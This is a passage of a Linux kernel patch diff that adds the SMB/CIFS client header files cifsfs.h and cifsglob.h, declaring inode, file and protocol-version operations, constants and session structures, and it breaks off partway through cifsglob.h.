+diff --git a/fs/smb/client/cifsfs.h b/fs/smb/client/cifsfs.h
+new file mode 100644
+index 0000000000000..b6c38896fb2db
+--- /dev/null
++++ b/fs/smb/client/cifsfs.h
+@@ -0,0 +1,161 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002, 2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#ifndef _CIFSFS_H
++#define _CIFSFS_H
++
++#include <linux/hash.h>
++
++#define ROOT_I 2
++
++/*
++ * ino_t is 32-bits on 32-bit arch. We have to squash the 64-bit value down
++ * so that it will fit. We use hash_64 to convert the value to 31 bits, and
++ * then add 1, to ensure that we don't end up with a 0 as the value.
++ */
++static inline ino_t
++cifs_uniqueid_to_ino_t(u64 fileid)
++{
++	if ((sizeof(ino_t)) < (sizeof(u64)))
++		return (ino_t)hash_64(fileid, (sizeof(ino_t) * 8) - 1) + 1;
++
++	return (ino_t)fileid;
++
++}
++
++static inline void cifs_set_time(struct dentry *dentry, unsigned long time)
++{
++	dentry->d_fsdata = (void *) time;
++}
++
++static inline unsigned long cifs_get_time(struct dentry *dentry)
++{
++	return (unsigned long) dentry->d_fsdata;
++}
++
++extern struct file_system_type cifs_fs_type, smb3_fs_type;
++extern const struct address_space_operations cifs_addr_ops;
++extern const struct address_space_operations cifs_addr_ops_smallbuf;
++
++/* Functions related to super block operations */
++extern void cifs_sb_active(struct super_block *sb);
++extern void cifs_sb_deactive(struct super_block *sb);
++
++/* Functions related to inodes */
++extern const struct inode_operations cifs_dir_inode_ops;
++extern struct inode *cifs_root_iget(struct super_block *);
++extern int cifs_create(struct user_namespace *, struct inode *,
++		       struct dentry *, umode_t, bool excl);
++extern int cifs_atomic_open(struct inode *, struct dentry *,
++			    struct file *, unsigned, umode_t);
++extern struct dentry *cifs_lookup(struct inode *, struct dentry *,
++				  unsigned int);
++extern int cifs_unlink(struct inode *dir, struct dentry *dentry);
++extern int cifs_hardlink(struct dentry *, struct inode *, struct dentry *);
++extern int cifs_mknod(struct user_namespace *, struct inode *, struct dentry *,
++		      umode_t, dev_t);
++extern int cifs_mkdir(struct user_namespace *, struct inode *, struct dentry *,
++		      umode_t);
++extern int cifs_rmdir(struct inode *, struct dentry *);
++extern int cifs_rename2(struct user_namespace *, struct inode *,
++			struct dentry *, struct inode *, struct dentry *,
++			unsigned int);
++extern int cifs_revalidate_file_attr(struct file *filp);
++extern int cifs_revalidate_dentry_attr(struct dentry *);
++extern int cifs_revalidate_file(struct file *filp);
++extern int cifs_revalidate_dentry(struct dentry *);
++extern int cifs_invalidate_mapping(struct inode *inode);
++extern int cifs_revalidate_mapping(struct inode *inode);
++extern int cifs_zap_mapping(struct inode *inode);
++extern int cifs_getattr(struct user_namespace *, const struct path *,
++			struct kstat *, u32, unsigned int);
++extern int cifs_setattr(struct user_namespace *, struct dentry *,
++			struct iattr *);
++extern int cifs_fiemap(struct inode *, struct fiemap_extent_info *, u64 start,
++		       u64 len);
++
++extern const struct inode_operations cifs_file_inode_ops;
++extern const struct inode_operations cifs_symlink_inode_ops;
++extern const struct inode_operations cifs_dfs_referral_inode_operations;
++
++
++/* Functions related to files and directories */
++extern const struct file_operations cifs_file_ops;
++extern const struct file_operations cifs_file_direct_ops; /* if directio mnt */
++extern const struct file_operations cifs_file_strict_ops; /* if strictio mnt */
++extern const struct file_operations cifs_file_nobrl_ops; /* no brlocks */
++extern const struct file_operations cifs_file_direct_nobrl_ops;
++extern const struct file_operations cifs_file_strict_nobrl_ops;
++extern int cifs_open(struct inode *inode, struct file *file);
++extern int cifs_close(struct inode *inode, struct file *file);
++extern int cifs_closedir(struct inode *inode, struct file *file);
++extern ssize_t cifs_user_readv(struct kiocb *iocb, struct iov_iter *to);
++extern ssize_t cifs_direct_readv(struct kiocb *iocb, struct iov_iter *to);
++extern ssize_t cifs_strict_readv(struct kiocb *iocb, struct iov_iter *to);
++extern ssize_t cifs_user_writev(struct kiocb *iocb, struct iov_iter *from);
++extern ssize_t cifs_direct_writev(struct kiocb *iocb, struct iov_iter *from);
++extern ssize_t cifs_strict_writev(struct kiocb *iocb, struct iov_iter *from);
++extern int cifs_flock(struct file *pfile, int cmd, struct file_lock *plock);
++extern int cifs_lock(struct file *, int, struct file_lock *);
++extern int cifs_fsync(struct file *, loff_t, loff_t, int);
++extern int cifs_strict_fsync(struct file *, loff_t, loff_t, int);
++extern int cifs_flush(struct file *, fl_owner_t id);
++extern int cifs_file_mmap(struct file * , struct vm_area_struct *);
++extern int cifs_file_strict_mmap(struct file * , struct vm_area_struct *);
++extern const struct file_operations cifs_dir_ops;
++extern int cifs_dir_open(struct inode *inode, struct file *file);
++extern int cifs_readdir(struct file *file, struct dir_context *ctx);
++
++/* Functions related to dir entries */
++extern const struct dentry_operations cifs_dentry_ops;
++extern const struct dentry_operations cifs_ci_dentry_ops;
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++extern struct vfsmount *cifs_dfs_d_automount(struct path *path);
++#else
++static inline struct vfsmount *cifs_dfs_d_automount(struct path *path)
++{
++	return ERR_PTR(-EREMOTE);
++}
++#endif
++
++/* Functions related to symlinks */
++extern const char *cifs_get_link(struct dentry *, struct inode *,
++			struct delayed_call *);
++extern int cifs_symlink(struct user_namespace *mnt_userns, struct inode *inode,
++			struct dentry *direntry, const char *symname);
++
++#ifdef CONFIG_CIFS_XATTR
++extern const struct xattr_handler *cifs_xattr_handlers[];
++extern ssize_t	cifs_listxattr(struct dentry *, char *, size_t);
++#else
++# define cifs_xattr_handlers NULL
++# define cifs_listxattr NULL
++#endif
++
++extern ssize_t cifs_file_copychunk_range(unsigned int xid,
++					struct file *src_file, loff_t off,
++					struct file *dst_file, loff_t destoff,
++					size_t len, unsigned int flags);
++
++extern long cifs_ioctl(struct file *filep, unsigned int cmd, unsigned long arg);
++extern void cifs_setsize(struct inode *inode, loff_t offset);
++extern int cifs_truncate_page(struct address_space *mapping, loff_t from);
++
++struct smb3_fs_context;
++extern struct dentry *cifs_smb3_do_mount(struct file_system_type *fs_type,
++					 int flags, struct smb3_fs_context *ctx);
++
++#ifdef CONFIG_CIFS_NFSD_EXPORT
++extern const struct export_operations cifs_export_ops;
++#endif /* CONFIG_CIFS_NFSD_EXPORT */
++
++/* when changing internal version - update following two lines at same time */
++#define SMB3_PRODUCT_BUILD 40
++#define CIFS_VERSION   "2.40"
++#endif				/* _CIFSFS_H */
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+new file mode 100644
+index 0000000000000..a37afbb7e399f
+--- /dev/null
++++ b/fs/smb/client/cifsglob.h
+@@ -0,0 +1,2208 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Jeremy Allison (jra@samba.org)
++ *
++ */
++#ifndef _CIFS_GLOB_H
++#define _CIFS_GLOB_H
++
++#include <linux/in.h>
++#include <linux/in6.h>
++#include <linux/inet.h>
++#include <linux/slab.h>
++#include <linux/scatterlist.h>
++#include <linux/mm.h>
++#include <linux/mempool.h>
++#include <linux/workqueue.h>
++#include <linux/utsname.h>
++#include <linux/sched/mm.h>
++#include <linux/netfs.h>
++#include "cifs_fs_sb.h"
++#include "cifsacl.h"
++#include <crypto/internal/hash.h>
++#include <linux/scatterlist.h>
++#include <uapi/linux/cifs/cifs_mount.h>
++#include "../common/smb2pdu.h"
++#include "smb2pdu.h"
++
++#define SMB_PATH_MAX 260
++#define CIFS_PORT 445
++#define RFC1001_PORT 139
++
++/*
++ * The sizes of various internal tables and strings
++ */
++#define MAX_UID_INFO 16
++#define MAX_SES_INFO 2
++#define MAX_TCON_INFO 4
++
++#define MAX_TREE_SIZE (2 + CIFS_NI_MAXHOST + 1 + CIFS_MAX_SHARE_LEN + 1)
++
++#define CIFS_MIN_RCV_POOL 4
++
++#define MAX_REOPEN_ATT	5 /* these many maximum attempts to reopen a file */
++/*
++ * default attribute cache timeout (jiffies)
++ */
++#define CIFS_DEF_ACTIMEO (1 * HZ)
++
++/*
++ * max attribute cache timeout (jiffies) - 2^30
++ */
++#define CIFS_MAX_ACTIMEO (1 << 30)
++
++/*
++ * Max persistent and resilient handle timeout (milliseconds).
++ * Windows durable max was 960000 (16 minutes)
++ */
++#define SMB3_MAX_HANDLE_TIMEOUT 960000
++
++/*
++ * MAX_REQ is the maximum number of requests that WE will send
++ * on one socket concurrently.
++ */
++#define CIFS_MAX_REQ 32767
++
++#define RFC1001_NAME_LEN 15
++#define RFC1001_NAME_LEN_WITH_NULL (RFC1001_NAME_LEN + 1)
++
++/* maximum length of ip addr as a string (including ipv6 and sctp) */
++#define SERVER_NAME_LENGTH 80
++#define SERVER_NAME_LEN_WITH_NULL     (SERVER_NAME_LENGTH + 1)
++
++/* echo interval in seconds */
++#define SMB_ECHO_INTERVAL_MIN 1
++#define SMB_ECHO_INTERVAL_MAX 600
++#define SMB_ECHO_INTERVAL_DEFAULT 60
++
++/* dns resolution intervals in seconds */
++#define SMB_DNS_RESOLVE_INTERVAL_MIN     120
++#define SMB_DNS_RESOLVE_INTERVAL_DEFAULT 600
++
++/* smb multichannel query server interfaces interval in seconds */
++#define SMB_INTERFACE_POLL_INTERVAL	600
++
++/* maximum number of PDUs in one compound */
++#define MAX_COMPOUND 5
++
++/*
++ * Default number of credits to keep available for SMB3.
++ * This value is chosen somewhat arbitrarily. The Windows client
++ * defaults to 128 credits, the Windows server allows clients up to
++ * 512 credits (or 8K for later versions), and the NetApp server
++ * does not limit clients at all.  Choose a high enough default value
++ * such that the client shouldn't limit performance, but allow mount
++ * to override (until you approach 64K, where we limit credits to 65000
++ * to reduce possibility of seeing more server credit overflow bugs.
++ */
++#define SMB2_MAX_CREDITS_AVAILABLE 32000
++
++#include "cifspdu.h"
++
++#ifndef XATTR_DOS_ATTRIB
++#define XATTR_DOS_ATTRIB "user.DOSATTRIB"
++#endif
++
++#define CIFS_MAX_WORKSTATION_LEN  (__NEW_UTS_LEN + 1)  /* reasonable max for client */
++
++/*
++ * CIFS vfs client Status information (based on what we know.)
++ */
++
++/* associated with each connection */
++enum statusEnum {
++	CifsNew = 0,
++	CifsGood,
++	CifsExiting,
++	CifsNeedReconnect,
++	CifsNeedNegotiate,
++	CifsInNegotiate,
++};
++
++/* associated with each smb session */
++enum ses_status_enum {
++	SES_NEW = 0,
++	SES_GOOD,
++	SES_EXITING,
++	SES_NEED_RECON,
++	SES_IN_SETUP
++};
++
++/* associated with each tree connection to the server */
++enum tid_status_enum {
++	TID_NEW = 0,
++	TID_GOOD,
++	TID_EXITING,
++	TID_NEED_RECON,
++	TID_NEED_TCON,
++	TID_IN_TCON,
++	TID_NEED_FILES_INVALIDATE, /* currently unused */
++	TID_IN_FILES_INVALIDATE
++};
++
++enum securityEnum {
++	Unspecified = 0,	/* not specified */
++	NTLMv2,			/* Legacy NTLM auth with NTLMv2 hash */
++	RawNTLMSSP,		/* NTLMSSP without SPNEGO, NTLMv2 hash */
++	Kerberos,		/* Kerberos via SPNEGO */
++};
++
++struct session_key {
++	unsigned int len;
++	char *response;
++};
++
++/* crypto hashing related structure/fields, not specific to a sec mech */
++struct cifs_secmech {
++	struct shash_desc *hmacmd5; /* hmacmd5 hash function, for NTLMv2/CR1 hashes */
++	struct shash_desc *md5; /* md5 hash function, for CIFS/SMB1 signatures */
++	struct shash_desc *hmacsha256; /* hmac-sha256 hash function, for SMB2 signatures */
++	struct shash_desc *sha512; /* sha512 hash function, for SMB3.1.1 preauth hash */
++	struct shash_desc *aes_cmac; /* block-cipher based MAC function, for SMB3 signatures */
++
++	struct crypto_aead *enc; /* smb3 encryption AEAD TFM (AES-CCM and AES-GCM) */
++	struct crypto_aead *dec; /* smb3 decryption AEAD TFM (AES-CCM and AES-GCM) */
++};
++
++/* per smb session structure/fields */
++struct ntlmssp_auth {
++	bool sesskey_per_smbsess; /* whether session key is per smb session */
++	__u32 client_flags; /* sent by client in type 1 ntlmsssp exchange */
++	__u32 server_flags; /* sent by server in type 2 ntlmssp exchange */
++	unsigned char ciphertext[CIFS_CPHTXT_SIZE]; /* sent to server */
++	char cryptkey[CIFS_CRYPTO_KEY_SIZE]; /* used by ntlmssp */
++};
++
++struct cifs_cred {
++	int uid;
++	int gid;
++	int mode;
++	int cecount;
++	struct cifs_sid osid;
++	struct cifs_sid gsid;
++	struct cifs_ntace *ntaces;
++	struct cifs_ace *aces;
++};
++
++struct cifs_open_info_data {
++	char *symlink_target;
++	union {
++		struct smb2_file_all_info fi;
++		struct smb311_posix_qinfo posix_fi;
++	};
++};
++
++static inline void cifs_free_open_info(struct cifs_open_info_data *data)
++{
++	kfree(data->symlink_target);
++}
++
++/*
++ *****************************************************************
++ * Except the CIFS PDUs themselves all the
++ * globally interesting structs should go here
++ *****************************************************************
++ */
++
++/*
++ * A smb_rqst represents a complete request to be issued to a server. It's
++ * formed by a kvec array, followed by an array of pages. Page data is assumed
++ * to start at the beginning of the first page.
++ */
++struct smb_rqst {
++	struct kvec	*rq_iov;	/* array of kvecs */
++	unsigned int	rq_nvec;	/* number of kvecs in array */
++	struct page	**rq_pages;	/* pointer to array of page ptrs */
++	unsigned int	rq_offset;	/* the offset to the 1st page */
++	unsigned int	rq_npages;	/* number pages in array */
++	unsigned int	rq_pagesz;	/* page size to use */
++	unsigned int	rq_tailsz;	/* length of last page */
++};
++
++struct mid_q_entry;
++struct TCP_Server_Info;
++struct cifsFileInfo;
++struct cifs_ses;
++struct cifs_tcon;
++struct dfs_info3_param;
++struct cifs_fattr;
++struct smb3_fs_context;
++struct cifs_fid;
++struct cifs_readdata;
++struct cifs_writedata;
++struct cifs_io_parms;
++struct cifs_search_info;
++struct cifsInodeInfo;
++struct cifs_open_parms;
++struct cifs_credits;
++
++struct smb_version_operations {
++	int (*send_cancel)(struct TCP_Server_Info *, struct smb_rqst *,
++			   struct mid_q_entry *);
++	bool (*compare_fids)(struct cifsFileInfo *, struct cifsFileInfo *);
++	/* setup request: allocate mid, sign message */
++	struct mid_q_entry *(*setup_request)(struct cifs_ses *,
++					     struct TCP_Server_Info *,
++					     struct smb_rqst *);
++	/* setup async request: allocate mid, sign message */
++	struct mid_q_entry *(*setup_async_request)(struct TCP_Server_Info *,
++						struct smb_rqst *);
++	/* check response: verify signature, map error */
++	int (*check_receive)(struct mid_q_entry *, struct TCP_Server_Info *,
++			     bool);
++	void (*add_credits)(struct TCP_Server_Info *server,
++			    const struct cifs_credits *credits,
++			    const int optype);
++	void (*set_credits)(struct TCP_Server_Info *, const int);
++	int * (*get_credits_field)(struct TCP_Server_Info *, const int);
++	unsigned int (*get_credits)(struct mid_q_entry *);
++	__u64 (*get_next_mid)(struct TCP_Server_Info *);
++	void (*revert_current_mid)(struct TCP_Server_Info *server,
++				   const unsigned int val);
++	/* data offset from read response message */
++	unsigned int (*read_data_offset)(char *);
++	/*
++	 * Data length from read response message
++	 * When in_remaining is true, the returned data length is in
++	 * message field DataRemaining for out-of-band data read (e.g through
++	 * Memory Registration RDMA write in SMBD).
++	 * Otherwise, the returned data length is in message field DataLength.
++	 */
++	unsigned int (*read_data_length)(char *, bool in_remaining);
++	/* map smb to linux error */
++	int (*map_error)(char *, bool);
++	/* find mid corresponding to the response message */
++	struct mid_q_entry * (*find_mid)(struct TCP_Server_Info *, char *);
++	void (*dump_detail)(void *buf, struct TCP_Server_Info *ptcp_info);
++	void (*clear_stats)(struct cifs_tcon *);
++	void (*print_stats)(struct seq_file *m, struct cifs_tcon *);
++	void (*dump_share_caps)(struct seq_file *, struct cifs_tcon *);
++	/* verify the message */
++	int (*check_message)(char *, unsigned int, struct TCP_Server_Info *);
++	bool (*is_oplock_break)(char *, struct TCP_Server_Info *);
++	int (*handle_cancelled_mid)(struct mid_q_entry *, struct TCP_Server_Info *);
++	void (*downgrade_oplock)(struct TCP_Server_Info *server,
++				 struct cifsInodeInfo *cinode, __u32 oplock,
++				 unsigned int epoch, bool *purge_cache);
++	/* process transaction2 response */
++	bool (*check_trans2)(struct mid_q_entry *, struct TCP_Server_Info *,
++			     char *, int);
++	/* check if we need to negotiate */
++	bool (*need_neg)(struct TCP_Server_Info *);
++	/* negotiate to the server */
++	int (*negotiate)(const unsigned int xid,
++			 struct cifs_ses *ses,
++			 struct TCP_Server_Info *server);
++	/* set negotiated write size */
++	unsigned int (*negotiate_wsize)(struct cifs_tcon *tcon, struct smb3_fs_context *ctx);
++	/* set negotiated read size */
++	unsigned int (*negotiate_rsize)(struct cifs_tcon *tcon, struct smb3_fs_context *ctx);
++	/* setup smb sessionn */
++	int (*sess_setup)(const unsigned int, struct cifs_ses *,
++			  struct TCP_Server_Info *server,
++			  const struct nls_table *);
++	/* close smb session */
++	int (*logoff)(const unsigned int, struct cifs_ses *);
++	/* connect to a server share */
++	int (*tree_connect)(const unsigned int, struct cifs_ses *, const char *,
++			    struct cifs_tcon *, const struct nls_table *);
++	/* close tree connecion */
++	int (*tree_disconnect)(const unsigned int, struct cifs_tcon *);
++	/* get DFS referrals */
++	int (*get_dfs_refer)(const unsigned int, struct cifs_ses *,
++			     const char *, struct dfs_info3_param **,
++			     unsigned int *, const struct nls_table *, int);
++	/* informational QFS call */
++	void (*qfs_tcon)(const unsigned int, struct cifs_tcon *,
++			 struct cifs_sb_info *);
++	/* check if a path is accessible or not */
++	int (*is_path_accessible)(const unsigned int, struct cifs_tcon *,
++				  struct cifs_sb_info *, const char *);
++	/* query path data from the server */
++	int (*query_path_info)(const unsigned int xid, struct cifs_tcon *tcon,
++			       struct cifs_sb_info *cifs_sb, const char *full_path,
++			       struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
++	/* query file data from the server */
++	int (*query_file_info)(const unsigned int xid, struct cifs_tcon *tcon,
++			       struct cifsFileInfo *cfile, struct cifs_open_info_data *data);
++	/* query reparse tag from srv to determine which type of special file */
++	int (*query_reparse_tag)(const unsigned int xid, struct cifs_tcon *tcon,
++				struct cifs_sb_info *cifs_sb, const char *path,
++				__u32 *reparse_tag);
++	/* get server index number */
++	int (*get_srv_inum)(const unsigned int xid, struct cifs_tcon *tcon,
++			    struct cifs_sb_info *cifs_sb, const char *full_path, u64 *uniqueid,
++			    struct cifs_open_info_data *data);
++	/* set size by path */
++	int (*set_path_size)(const unsigned int, struct cifs_tcon *,
++			     const char *, __u64, struct cifs_sb_info *, bool);
++	/* set size by file handle */
++	int (*set_file_size)(const unsigned int, struct cifs_tcon *,
++			     struct cifsFileInfo *, __u64, bool);
++	/* set attributes */
++	int (*set_file_info)(struct inode *, const char *, FILE_BASIC_INFO *,
++			     const unsigned int);
++	int (*set_compression)(const unsigned int, struct cifs_tcon *,
++			       struct cifsFileInfo *);
++	/* check if we can send an echo or nor */
++	bool (*can_echo)(struct TCP_Server_Info *);
++	/* send echo request */
++	int (*echo)(struct TCP_Server_Info *);
++	/* create directory */
++	int (*posix_mkdir)(const unsigned int xid, struct inode *inode,
++			umode_t mode, struct cifs_tcon *tcon,
++			const char *full_path,
++			struct cifs_sb_info *cifs_sb);
++	int (*mkdir)(const unsigned int xid, struct inode *inode, umode_t mode,
++		     struct cifs_tcon *tcon, const char *name,
++		     struct cifs_sb_info *sb);
++	/* set info on created directory */
++	void (*mkdir_setinfo)(struct inode *, const char *,
++			      struct cifs_sb_info *, struct cifs_tcon *,
++			      const unsigned int);
++	/* remove directory */
++	int (*rmdir)(const unsigned int, struct cifs_tcon *, const char *,
++		     struct cifs_sb_info *);
++	/* unlink file */
++	int (*unlink)(const unsigned int, struct cifs_tcon *, const char *,
++		      struct cifs_sb_info *);
++	/* open, rename and delete file */
++	int (*rename_pending_delete)(const char *, struct dentry *,
++				     const unsigned int);
++	/* send rename request */
++	int (*rename)(const unsigned int, struct cifs_tcon *, const char *,
++		      const char *, struct cifs_sb_info *);
++	/* send create hardlink request */
++	int (*create_hardlink)(const unsigned int, struct cifs_tcon *,
++			       const char *, const char *,
++			       struct cifs_sb_info *);
++	/* query symlink target */
++	int (*query_symlink)(const unsigned int, struct cifs_tcon *,
++			     struct cifs_sb_info *, const char *,
++			     char **, bool);
++	/* open a file for non-posix mounts */
++	int (*open)(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
++		    void *buf);
++	/* set fid protocol-specific info */
++	void (*set_fid)(struct cifsFileInfo *, struct cifs_fid *, __u32);
++	/* close a file */
++	void (*close)(const unsigned int, struct cifs_tcon *,
++		      struct cifs_fid *);
++	/* close a file, returning file attributes and timestamps */
++	void (*close_getattr)(const unsigned int xid, struct cifs_tcon *tcon,
++		      struct cifsFileInfo *pfile_info);
++	/* send a flush request to the server */
++	int (*flush)(const unsigned int, struct cifs_tcon *, struct cifs_fid *);
++	/* async read from the server */
++	int (*async_readv)(struct cifs_readdata *);
++	/* async write to the server */
++	int (*async_writev)(struct cifs_writedata *,
++			    void (*release)(struct kref *));
++	/* sync read from the server */
++	int (*sync_read)(const unsigned int, struct cifs_fid *,
++			 struct cifs_io_parms *, unsigned int *, char **,
++			 int *);
++	/* sync write to the server */
++	int (*sync_write)(const unsigned int, struct cifs_fid *,
++			  struct cifs_io_parms *, unsigned int *, struct kvec *,
++			  unsigned long);
++	/* open dir, start readdir */
++	int (*query_dir_first)(const unsigned int, struct cifs_tcon *,
++			       const char *, struct cifs_sb_info *,
++			       struct cifs_fid *, __u16,
++			       struct cifs_search_info *);
++	/* continue readdir */
++	int (*query_dir_next)(const unsigned int, struct cifs_tcon *,
++			      struct cifs_fid *,
++			      __u16, struct cifs_search_info *srch_inf);
++	/* close dir */
++	int (*close_dir)(const unsigned int, struct cifs_tcon *,
++			 struct cifs_fid *);
++	/* calculate a size of SMB message */
++	unsigned int (*calc_smb_size)(void *buf);
++	/* check for STATUS_PENDING and process the response if yes */
++	bool (*is_status_pending)(char *buf, struct TCP_Server_Info *server);
++	/* check for STATUS_NETWORK_SESSION_EXPIRED */
++	bool (*is_session_expired)(char *);
++	/* send oplock break response */
++	int (*oplock_response)(struct cifs_tcon *tcon, __u64 persistent_fid, __u64 volatile_fid,
++			__u16 net_fid, struct cifsInodeInfo *cifs_inode);
++	/* query remote filesystem */
++	int (*queryfs)(const unsigned int, struct cifs_tcon *,
++		       struct cifs_sb_info *, struct kstatfs *);
++	/* send mandatory brlock to the server */
++	int (*mand_lock)(const unsigned int, struct cifsFileInfo *, __u64,
++			 __u64, __u32, int, int, bool);
++	/* unlock range of mandatory locks */
++	int (*mand_unlock_range)(struct cifsFileInfo *, struct file_lock *,
++				 const unsigned int);
++	/* push brlocks from the cache to the server */
++	int (*push_mand_locks)(struct cifsFileInfo *);
++	/* get lease key of the inode */
++	void (*get_lease_key)(struct inode *, struct cifs_fid *);
++	/* set lease key of the inode */
++	void (*set_lease_key)(struct inode *, struct cifs_fid *);
++	/* generate new lease key */
++	void (*new_lease_key)(struct cifs_fid *);
++	int (*generate_signingkey)(struct cifs_ses *ses,
++				   struct TCP_Server_Info *server);
++	int (*calc_signature)(struct smb_rqst *, struct TCP_Server_Info *,
++				bool allocate_crypto);
++	int (*set_integrity)(const unsigned int, struct cifs_tcon *tcon,
++			     struct cifsFileInfo *src_file);
++	int (*enum_snapshots)(const unsigned int xid, struct cifs_tcon *tcon,
++			     struct cifsFileInfo *src_file, void __user *);
++	int (*notify)(const unsigned int xid, struct file *pfile,
++			     void __user *pbuf, bool return_changes);
++	int (*query_mf_symlink)(unsigned int, struct cifs_tcon *,
++				struct cifs_sb_info *, const unsigned char *,
++				char *, unsigned int *);
++	int (*create_mf_symlink)(unsigned int, struct cifs_tcon *,
++				 struct cifs_sb_info *, const unsigned char *,
++				 char *, unsigned int *);
++	/* if we can do cache read operations */
++	bool (*is_read_op)(__u32);
++	/* set oplock level for the inode */
++	void (*set_oplock_level)(struct cifsInodeInfo *, __u32, unsigned int,
++				 bool *);
++	/* create lease context buffer for CREATE request */
++	char * (*create_lease_buf)(u8 *lease_key, u8 oplock);
++	/* parse lease context buffer and return oplock/epoch info */
++	__u8 (*parse_lease_buf)(void *buf, unsigned int *epoch, char *lkey);
++	ssize_t (*copychunk_range)(const unsigned int,
++			struct cifsFileInfo *src_file,
++			struct cifsFileInfo *target_file,
++			u64 src_off, u64 len, u64 dest_off);
++	int (*duplicate_extents)(const unsigned int, struct cifsFileInfo *src,
++			struct cifsFileInfo *target_file, u64 src_off, u64 len,
++			u64 dest_off);
++	int (*validate_negotiate)(const unsigned int, struct cifs_tcon *);
++	ssize_t (*query_all_EAs)(const unsigned int, struct cifs_tcon *,
++			const unsigned char *, const unsigned char *, char *,
++			size_t, struct cifs_sb_info *);
++	int (*set_EA)(const unsigned int, struct cifs_tcon *, const char *,
++			const char *, const void *, const __u16,
++			const struct nls_table *, struct cifs_sb_info *);
++	struct cifs_ntsd * (*get_acl)(struct cifs_sb_info *, struct inode *,
++			const char *, u32 *, u32);
++	struct cifs_ntsd * (*get_acl_by_fid)(struct cifs_sb_info *,
++			const struct cifs_fid *, u32 *, u32);
++	int (*set_acl)(struct cifs_ntsd *, __u32, struct inode *, const char *,
++			int);
++	/* writepages retry size */
++	unsigned int (*wp_retry_size)(struct inode *);
++	/* get mtu credits */
++	int (*wait_mtu_credits)(struct TCP_Server_Info *, unsigned int,
++				unsigned int *, struct cifs_credits *);
++	/* adjust previously taken mtu credits to request size */
++	int (*adjust_credits)(struct TCP_Server_Info *server,
++			      struct cifs_credits *credits,
++			      const unsigned int payload_size);
++	/* check if we need to issue closedir */
++	bool (*dir_needs_close)(struct cifsFileInfo *);
++	long (*fallocate)(struct file *, struct cifs_tcon *, int, loff_t,
++			  loff_t);
++	/* init transform request - used for encryption for now */
++	int (*init_transform_rq)(struct TCP_Server_Info *, int num_rqst,
++				 struct smb_rqst *, struct smb_rqst *);
++	int (*is_transform_hdr)(void *buf);
++	int (*receive_transform)(struct TCP_Server_Info *,
++				 struct mid_q_entry **, char **, int *);
++	enum securityEnum (*select_sectype)(struct TCP_Server_Info *,
++			    enum securityEnum);
++	int (*next_header)(char *);
++	/* ioctl passthrough for query_info */
++	int (*ioctl_query_info)(const unsigned int xid,
++				struct cifs_tcon *tcon,
++				struct cifs_sb_info *cifs_sb,
++				__le16 *path, int is_dir,
++				unsigned long p);
++	/* make unix special files (block, char, fifo, socket) */
++	int (*make_node)(unsigned int xid,
++			 struct inode *inode,
++			 struct dentry *dentry,
++			 struct cifs_tcon *tcon,
++			 const char *full_path,
++			 umode_t mode,
++			 dev_t device_number);
++	/* version specific fiemap implementation */
++	int (*fiemap)(struct cifs_tcon *tcon, struct cifsFileInfo *,
++		      struct fiemap_extent_info *, u64, u64);
++	/* version specific llseek implementation */
++	loff_t (*llseek)(struct file *, struct cifs_tcon *, loff_t, int);
++	/* Check for STATUS_IO_TIMEOUT */
++	bool (*is_status_io_timeout)(char *buf);
++	/* Check for STATUS_NETWORK_NAME_DELETED */
++	void (*is_network_name_deleted)(char *buf, struct TCP_Server_Info *srv);
++};
++
++struct smb_version_values {
++	char		*version_string;
++	__u16		protocol_id;
++	__u32		req_capabilities;
++	__u32		large_lock_type;
++	__u32		exclusive_lock_type;
++	__u32		shared_lock_type;
++	__u32		unlock_lock_type;
++	size_t		header_preamble_size;
++	size_t		header_size;
++	size_t		max_header_size;
++	size_t		read_rsp_size;
++	__le16		lock_cmd;
++	unsigned int	cap_unix;
++	unsigned int	cap_nt_find;
++	unsigned int	cap_large_files;
++	__u16		signing_enabled;
++	__u16		signing_required;
++	size_t		create_lease_size;
++};
++
++#define HEADER_SIZE(server) (server->vals->header_size)
++#define MAX_HEADER_SIZE(server) (server->vals->max_header_size)
++#define HEADER_PREAMBLE_SIZE(server) (server->vals->header_preamble_size)
++#define MID_HEADER_SIZE(server) (HEADER_SIZE(server) - 1 - HEADER_PREAMBLE_SIZE(server))
++
++/**
++ * CIFS superblock mount flags (mnt_cifs_flags) to consider when
++ * trying to reuse existing superblock for a new mount
++ */
++#define CIFS_MOUNT_MASK (CIFS_MOUNT_NO_PERM | CIFS_MOUNT_SET_UID | \
++			 CIFS_MOUNT_SERVER_INUM | CIFS_MOUNT_DIRECT_IO | \
++			 CIFS_MOUNT_NO_XATTR | CIFS_MOUNT_MAP_SPECIAL_CHR | \
++			 CIFS_MOUNT_MAP_SFM_CHR | \
++			 CIFS_MOUNT_UNX_EMUL | CIFS_MOUNT_NO_BRL | \
++			 CIFS_MOUNT_CIFS_ACL | CIFS_MOUNT_OVERR_UID | \
++			 CIFS_MOUNT_OVERR_GID | CIFS_MOUNT_DYNPERM | \
++			 CIFS_MOUNT_NOPOSIXBRL | CIFS_MOUNT_NOSSYNC | \
++			 CIFS_MOUNT_FSCACHE | CIFS_MOUNT_MF_SYMLINKS | \
++			 CIFS_MOUNT_MULTIUSER | CIFS_MOUNT_STRICT_IO | \
++			 CIFS_MOUNT_CIFS_BACKUPUID | CIFS_MOUNT_CIFS_BACKUPGID | \
++			 CIFS_MOUNT_UID_FROM_ACL | CIFS_MOUNT_NO_HANDLE_CACHE | \
++			 CIFS_MOUNT_NO_DFS | CIFS_MOUNT_MODE_FROM_SID | \
++			 CIFS_MOUNT_RO_CACHE | CIFS_MOUNT_RW_CACHE)
++
++/**
++ * Generic VFS superblock mount flags (s_flags) to consider when
++ * trying to reuse existing superblock for a new mount
++ */
++#define CIFS_MS_MASK (SB_RDONLY | SB_MANDLOCK | SB_NOEXEC | SB_NOSUID | \
++		      SB_NODEV | SB_SYNCHRONOUS)
++
++struct cifs_mnt_data {
++	struct cifs_sb_info *cifs_sb;
++	struct smb3_fs_context *ctx;
++	int flags;
++};
++
++static inline unsigned int
++get_rfc1002_length(void *buf)
++{
